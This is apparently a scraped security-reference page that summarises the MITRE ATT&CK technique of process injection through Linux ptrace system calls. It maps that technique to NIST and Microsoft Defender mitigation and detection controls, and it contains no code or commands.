Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.
Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018)
Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| PR.PS-05.02 | Mobile code prevention | Mitigates | T1055.008 | Ptrace System Calls |
Comments
Mobile code procedures address specific actions taken to prevent the development, acquisition, and introduction of unacceptable mobile code within organizational systems, including requiring mobile code to be digitally signed by a trusted source.
References
|
| PR.AA-05.02 | Privileged system access | Mitigates | T1055.008 | Ptrace System Calls |
Comments
This diagnostic statement protects against Ptrace System Calls through the use of privileged account management and the use of multi-factor authentication.
References
|
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| CM-06 | Configuration Settings | mitigates | T1055.008 | Ptrace System Calls | |
| CM-05 | Access Restrictions for Change | mitigates | T1055.008 | Ptrace System Calls | |
| SC-18 | Mobile Code | mitigates | T1055.008 | Ptrace System Calls | |
| SI-02 | Flaw Remediation | mitigates | T1055.008 | Ptrace System Calls | |
| SI-03 | Malicious Code Protection | mitigates | T1055.008 | Ptrace System Calls | |
| IA-02 | Identification and Authentication (Organizational Users) | mitigates | T1055.008 | Ptrace System Calls | |
| SI-04 | System Monitoring | mitigates | T1055.008 | Ptrace System Calls | |
| AC-02 | Account Management | mitigates | T1055.008 | Ptrace System Calls | |
| AC-03 | Access Enforcement | mitigates | T1055.008 | Ptrace System Calls | |
| AC-05 | Separation of Duties | mitigates | T1055.008 | Ptrace System Calls | |
| AC-06 | Least Privilege | mitigates | T1055.008 | Ptrace System Calls | |
| SC-07 | Boundary Protection | mitigates | T1055.008 | Ptrace System Calls |
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| defender_for_app_service | Microsoft Defender for Cloud: Defender for App Service | technique_scores | T1055.008 | Ptrace System Calls |
Comments
Injection attacks are specifically cited as a detection focus for Fileless Attack Detection, which is part of this control, with even more specific references to Process Hollowing, executable image injection, and threads started in a dynamically allocated code segment. Detection is periodic at an unknown rate.
References
|